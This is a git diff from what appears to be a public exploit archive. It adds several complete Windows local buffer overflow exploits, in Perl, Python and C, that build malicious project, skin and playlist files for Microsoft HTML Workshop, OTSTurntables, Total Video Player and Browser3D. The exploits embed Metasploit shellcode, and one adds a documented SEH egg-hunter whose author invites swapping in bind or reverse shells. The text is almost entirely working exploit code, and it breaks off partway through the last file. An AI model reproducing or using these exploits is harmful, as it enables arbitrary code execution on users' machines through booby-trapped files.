-my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]
-
-
-open(my $hhpprj_file, "> s.hhp");
-print $hhpprj_file $hhp_data1.
-		   $overflow1.$shellhunter.$overflow2.$ret.
-                   $crlf.$crlf.
-                   $hhp_data2.
-                   $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
-                   $crlf;
-close $hhpprj_file;
-
-# milw0rm.com [2009-01-12]
+#!/usr/bin/perl
+# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
+# -----------------------------------------------------------------
+# Discovered/Exploit by SkD                    (skdrat@hotmail.com)
+# -----------------------------------------------------------------
+#
+# This is a continuation of my new method, shellhunting.
+# The exploit is far more advanced than the Amaya's as it runs on
+# every system, partly because the shellhunter itself is very much
+# reliable and universal.
+# The shellhunter does the following tasks to find and exec.
+# shellcode:-
+#
+# 1- Searches through the whole memory of the application.
+# 2- Installs a SEH handler so on access violations it won't
+#    stop hunting for the shellcode.
+# 3- Repairs stack so a stack overflow won't occur (that is what
+#    happens when the SEH is called up, many PUSH instructions
+#    are called from the relevant modules (ntdll, etc).
+# 4- Improved speed by searching through 32 bytes at a time.
+# 5- Uses a certain address in memory to store a variable for the
+#    search.
+#
+# It is very stable and will allow any shellcode (bind/reverse shell,
+# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
+#
+# Yeah, I guess that's about it. Took me a few hours to figure out the
+# whole thing but nothing is impossible ;).
+#
+# Oh, I think some schools use this software :) (it's Microsoft's, right?).
+#
+# You can download the app. from Microsoft's official page:
+# ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
+#
+# If you are interested in my method and want to learn something new or
+# improve your exploitation skills then visit my team's blog at:
+# ->  http://abysssec.com
+#
+# Peace out,
+# SkD.
+
+
+
+my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
+	        "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
+                "\x6E\x74\x73\x20\x66\x69\x6C\x65".
+                "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
+	        "\x78\x20\x66\x69\x6C\x65\x3D";
+my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
+		"\x0A\x61\x2E\x68\x74\x6D";
+my $crlf      = "\x0d\x0a";
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
+"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
+"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
+"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
+"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
+"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
+"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
+"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
+"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
+"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
+"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
+"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
+"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
+"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
+"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
+"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
+"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
+"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
+"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
+
+
+#/----------------Advanced Shellhunter Code----------------\
+#01D717DD   EB 1E            JMP SHORT 01D717FD            |
+#01D717DF   83C4 64          ADD ESP,64                    |
+#01D717E2   83C4 64          ADD ESP,64                    |
+#01D717E5   83C4 64          ADD ESP,64                    |
+#01D717E8   83C4 64          ADD ESP,64                    |
+#01D717EB   83C4 64          ADD ESP,64                    |
+#01D717EE   83C4 64          ADD ESP,64                    |
+#01D717F1   83C4 64          ADD ESP,64                    |
+#01D717F4   83C4 64          ADD ESP,64                    |
+#01D717F7   83C4 64          ADD ESP,64                    |
+#01D717FA   83C4 54          ADD ESP,54                    |
+#01D717FD   33FF             XOR EDI,EDI                   |
+#01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
+#01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
+#01D71806   EB 0E            JMP SHORT 01D71816            |
+#01D71808   58               POP EAX                       |
+#01D71809   83E8 3C          SUB EAX,3C                    |
+#01D7180C   50               PUSH EAX                      |
+#01D7180D   6A FF            PUSH -1                       |
+#01D7180F   33DB             XOR EBX,EBX                   |
+#01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
+#01D71814   EB 05            JMP SHORT 01D7181B            |
+#01D71816   E8 EDFFFFFF      CALL 01D71808                 |
+#01D7181B   B8 12121212      MOV EAX,12121212              |
+#01D71820   6BC0 02          IMUL EAX,EAX,2                |
+#01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
+#01D71828   83C7 20          ADD EDI,20                    |
+#01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
+#01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
+#01D7182F  ^75 F7            JNZ SHORT 01D71828            |
+#01D71831   83C7 04          ADD EDI,4                     |
+#01D71834   6BC0 02          IMUL EAX,EAX,2                |
+#01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
+#01D71839  ^75 E0            JNZ SHORT 01D7181B            |
+#01D7183B   83C7 04          ADD EDI,4                     |
+#01D7183E   B8 42424242      MOV EAX,42424242              |
+#01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
+#01D71845  ^75 D4            JNZ SHORT 01D7181B            |
+#01D71847   83C7 04          ADD EDI,4                     |
+#01D7184A   FFE7             JMP EDI                       |
+#\-----------------------End of Code----------------------/
+
+my $shellhunter = "\xeb\x1e".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x64".
+                  "\x83\xc4\x54".
+		  "\x33\xff".
+		  "\xba\xd0\xfa\xfd\x7f".
+                  "\x8b\x3a".
+                  "\xeb\x0e".
+                  "\x58".
+                  "\x83\xe8\x3c".
+                  "\x50".
+                  "\x6a\xff".
+                  "\x33\xdb".
+                  "\x64\x89\x23".
+                  "\xeb\x05".
+                  "\xe8\xed\xff\xff\xff".
+                  "\xb8\x12\x12\x12\x12".
+                  "\x6b\xc0\x02".
+                  "\xba\xd0\xfa\xfd\x7f".
+                  "\x83\xc7\x20".
+                  "\x89\x3a".
+                  "\x39\x07".
+                  "\x75\xf7".
+                  "\x83\xc7\x04".
+                  "\x6b\xc0\x02".
+                  "\x39\x07".
+                  "\x75\xe0".
+                  "\x83\xc7\x04".
+                  "\xb8\x42\x42\x42\x42".
+                  "\x39\x07".
+                  "\x75\xd4".
+                  "\x83\xc7\x04".
+                  "\xff\xe7";
+my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
+my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
+my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
+my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
+my $len = 280 - (length($shellhunter) + 55);
+my $overflow1 = "\x41" x $len;
+my $overflow2 = "\x41" x 55;
+my $overflow3 = "\x42" x 256;
+my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]
+
+
+open(my $hhpprj_file, "> s.hhp");
+print $hhpprj_file $hhp_data1.
+		   $overflow1.$shellhunter.$overflow2.$ret.
+                   $crlf.$crlf.
+                   $hhp_data2.
+                   $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
+                   $crlf;
+close $hhpprj_file;
+
+# milw0rm.com [2009-01-12]
diff --git a/platforms/windows/local/7765.py b/platforms/windows/local/7765.py
index 271850cb9..e9b53b813 100755
--- a/platforms/windows/local/7765.py
+++ b/platforms/windows/local/7765.py
@@ -1,45 +1,45 @@
-#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
-#  Discovered & exploited bY suN8Hclf
-#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
-#  Tested on: Windows XP SP2 Polish Full patched
-#  
-#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
-#
-#  Thanks to Myo and to everyone who knows what hacking really is 
-#  Not for money dude, only for fun !!!
-
-print "====================================================================="
-print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
-print " bY suN8Hclf (crimson.loyd@gmail.com)"
-print "====================================================================="
-
-nops = "\x90" * 4
-ret = "\x75\x52\x46";   # call ebx
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode = (
-	"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
-	"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
-	"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
-	"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
-	"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
-	"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
-	"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
-	"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
-	"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
-	"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
-	"\xac\x2c\xc9\x40"
-    )
-num = 276 - 4 - 160
-buff = "\x41" * num
-
-exploit = nops + shellcode + buff + ret
-try:
-    out_file = open("open_me.ofl",'w')
-    out_file.write(exploit)
-    out_file.close()
-    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
-except:
-    print "WTF?"
-
-# milw0rm.com [2009-01-14]
+#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
+#  Discovered & exploited bY suN8Hclf
+#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
+#  Tested on: Windows XP SP2 Polish Full patched
+#  
+#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
+#
+#  Thanks to Myo and to everyone who knows what hacking really is 
+#  Not for money dude, only for fun !!!
+
+print "====================================================================="
+print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
+print " bY suN8Hclf (crimson.loyd@gmail.com)"
+print "====================================================================="
+
+nops = "\x90" * 4
+ret = "\x75\x52\x46";   # call ebx
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode = (
+	"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
+	"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
+	"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
+	"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
+	"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
+	"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
+	"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
+	"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
+	"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
+	"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
+	"\xac\x2c\xc9\x40"
+    )
+num = 276 - 4 - 160
+buff = "\x41" * num
+
+exploit = nops + shellcode + buff + ret
+try:
+    out_file = open("open_me.ofl",'w')
+    out_file.write(exploit)
+    out_file.close()
+    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
+except:
+    print "WTF?"
+
+# milw0rm.com [2009-01-14]
diff --git a/platforms/windows/local/7839.py b/platforms/windows/local/7839.py
index 1f2fa5f06..56b55aca7 100755
--- a/platforms/windows/local/7839.py
+++ b/platforms/windows/local/7839.py
@@ -1,53 +1,53 @@
-#!/usr/bin/python
-import socket
-print "******************************************************"
-print " Total Video Player V1.31 Local Stack Overflow\n"
-print " Author: His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print " dz-secure.com\n snakespc.com\n dz-security.net"
-print "******************************************************"
-
-header1 = (
-	"\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57"
-	"\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C"
-	"\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53"
-	"\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61"
-	"\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E"
-	"\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0A\x4D\x61\x69\x6E\x3D"
-	"\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62"
-	"\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77"
-	"\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0A\x43"
-	"\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D")
-
-header2=(
-	"\x2E\x62\x6D\x70\x0A\x56\x65\x72\x74\x69\x63\x6C\x65\x53\x63\x72"
-	"\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75\x6D\x62\x3D\x56\x65\x72\x74"
-	"\x69\x63\x6C\x65\x53\x63\x72\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75"
-	"\x6D\x62\x2E\x62\x6D\x70")
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode=(
-	"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5"
-	"\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa"
-	"\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6"
-	"\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2"
-	"\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89"
-	"\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb"
-	"\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64"
-	"\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87"
-	"\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb"
-	"\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef")
-	
-buffer = header1 + "\x41"*221 + "\x7C\xE1\xA7\x7C" + "\x90"*20 + shellcode + header2
-
-try:
-    out_file = open("DefaultSkin.ini",'w')
-    out_file.write(buffer)
-    out_file.close()
-    print("\n Exploit file created!, Now replace this file in Skins\DefaultSkin folder\n and run the program\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-01-20]
+#!/usr/bin/python
+import socket
+print "******************************************************"
+print " Total Video Player V1.31 Local Stack Overflow\n"
+print " Author: His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print " dz-secure.com\n snakespc.com\n dz-security.net"
+print "******************************************************"
+
+header1 = (
+	"\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57"
+	"\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C"
+	"\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53"
+	"\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61"
+	"\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E"
+	"\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0A\x4D\x61\x69\x6E\x3D"
+	"\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62"
+	"\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77"
+	"\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0A\x43"
+	"\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D")
+
+header2=(
+	"\x2E\x62\x6D\x70\x0A\x56\x65\x72\x74\x69\x63\x6C\x65\x53\x63\x72"
+	"\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75\x6D\x62\x3D\x56\x65\x72\x74"
+	"\x69\x63\x6C\x65\x53\x63\x72\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75"
+	"\x6D\x62\x2E\x62\x6D\x70")
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode=(
+	"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5"
+	"\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa"
+	"\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6"
+	"\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2"
+	"\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89"
+	"\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb"
+	"\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64"
+	"\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87"
+	"\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb"
+	"\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef")
+	
+buffer = header1 + "\x41"*221 + "\x7C\xE1\xA7\x7C" + "\x90"*20 + shellcode + header2
+
+try:
+    out_file = open("DefaultSkin.ini",'w')
+    out_file.write(buffer)
+    out_file.close()
+    print("\n Exploit file created!, Now replace this file in Skins\DefaultSkin folder\n and run the program\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-01-20]
diff --git a/platforms/windows/local/7843.c b/platforms/windows/local/7843.c
index 952a4b023..16254da41 100755
--- a/platforms/windows/local/7843.c
+++ b/platforms/windows/local/7843.c
@@ -1,42 +1,42 @@
-#include<stdio.h>
-#include<string.h>
-#include<windows.h>
-
-/* Browser3D local BOF exploit
-* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
-*greetz to: all friends & all morroccan hackers
-*special tnx for str0ke
-/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
-unsigned char scode[] =
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2"
-"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47"
-"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b"
-"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f"
-"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64"
-"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26"
-"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89"
-"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a"
-"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06"
-"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
-int main(int argc,char *argv[]){
-    printf("\t ===>viva marrakesh city<===\t\n");
-    FILE *openfile;
-    char exploit[430];
-    char junk[262];
-    char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2)
-    char nop[]="\x90\x90\x90\x90";
-    memset(junk,0x90,262);
-    memcpy(exploit,junk,strlen(junk));
-    memcpy(exploit+strlen(junk),ret,strlen(ret));
-    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
-    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
-    openfile=fopen("simo.sfs","wb");
-    if(openfile==NULL){ perror("can't opening this file\n"); }
-    fwrite(exploit,1,sizeof(exploit),openfile);
-    fclose(openfile);
-    printf("file created ....!"
-                 "open it whit Browser3d");
-    return 0;
-}
-
-// milw0rm.com [2009-01-22]
+#include<stdio.h>
+#include<string.h>
+#include<windows.h>
+
+/* Browser3D local BOF exploit
+* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
+*greetz to: all friends & all morroccan hackers
+*special tnx for str0ke
+/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char scode[] =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2"
+"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47"
+"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b"
+"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f"
+"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64"
+"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26"
+"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89"
+"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a"
+"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06"
+"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
+int main(int argc,char *argv[]){
+    printf("\t ===>viva marrakesh city<===\t\n");
+    FILE *openfile;
+    char exploit[430];
+    char junk[262];
+    char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2)
+    char nop[]="\x90\x90\x90\x90";
+    memset(junk,0x90,262);
+    memcpy(exploit,junk,strlen(junk));
+    memcpy(exploit+strlen(junk),ret,strlen(ret));
+    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
+    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
+    openfile=fopen("simo.sfs","wb");
+    if(openfile==NULL){ perror("can't opening this file\n"); }
+    fwrite(exploit,1,sizeof(exploit),openfile);
+    fclose(openfile);
+    printf("file created ....!"
+                 "open it whit Browser3d");
+    return 0;
+}
+
+// milw0rm.com [2009-01-22]
diff --git a/platforms/windows/local/7848.pl b/platforms/windows/local/7848.pl
index dacd635e5..bd32edd28 100755
--- a/platforms/windows/local/7848.pl
+++ b/platforms/windows/local/7848.pl
@@ -1,47 +1,47 @@
-#!/usr/bin/perl
-# By ALpHaNiX
-# NullArea.Net
-# THanks
-
-system("color 5");
-
-if (@ARGV != 1) { &help; exit(); }
-
-sub help(){
-	print "[X] Usage : ./exploit.pl filename \n";
-}
-
-{ $file = $ARGV[0]; }
-print "\n [X]*************************************************\n";
-print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*\n";
-print " [X]        Coded By AlpHaNiX                        *\n";
-print " [X]         From Null Area [NullArea.Net]           *\n";
-print " [X]**************************************************\n\n";
-
-print "[+] Exploiting.....\n" ;
-
-my $acc="\x41" x 300 ;
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
-http://metasploit.com
-my $shellcode =
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5d".
-"\x7e\xf1\x8c\x83\xeb\xfc\xe2\xf4\xa1\x96\xb5\x8c\x5d\x7e\x7a\xc9".
-"\x61\xf5\x8d\x89\x25\x7f\x1e\x07\x12\x66\x7a\xd3\x7d\x7f\x1a\xc5".
-"\xd6\x4a\x7a\x8d\xb3\x4f\x31\x15\xf1\xfa\x31\xf8\x5a\xbf\x3b\x81".
-"\x5c\xbc\x1a\x78\x66\x2a\xd5\x88\x28\x9b\x7a\xd3\x79\x7f\x1a\xea".
-"\xd6\x72\xba\x07\x02\x62\xf0\x67\xd6\x62\x7a\x8d\xb6\xf7\xad\xa8".
-"\x59\xbd\xc0\x4c\x39\xf5\xb1\xbc\xd8\xbe\x89\x80\xd6\x3e\xfd\x07".
-"\x2d\x62\x5c\x07\x35\x76\x1a\x85\xd6\xfe\x41\x8c\x5d\x7e\x7a\xe4".
-"\x61\x21\xc0\x7a\x3d\x28\x78\x74\xde\xbe\x8a\xdc\x35\x8e\x7b\x88".
-"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c";
-my $ret ="\x1a\x0f\x46\x77"  ; #  jmp ESP in Windows VISTA
-my $nop ="\x90" x 20 ;# some lame nops lol
-my $exploit = $acc.$ret.$nop.$shellcode;
-print "[+] Creating Evil File" ;
-open($FILE, ">>$file") or die "Cannot open $file";
-print $FILE $exploit;
-close($FILE);
-print "\n[+] Please wait while creating $file";
-print "\n[+] $file has been created";
-
-# milw0rm.com [2009-01-22]
+#!/usr/bin/perl
+# By ALpHaNiX
+# NullArea.Net
+# THanks
+
+system("color 5");
+
+if (@ARGV != 1) { &help; exit(); }
+
+sub help(){
+	print "[X] Usage : ./exploit.pl filename \n";
+}
+
+{ $file = $ARGV[0]; }
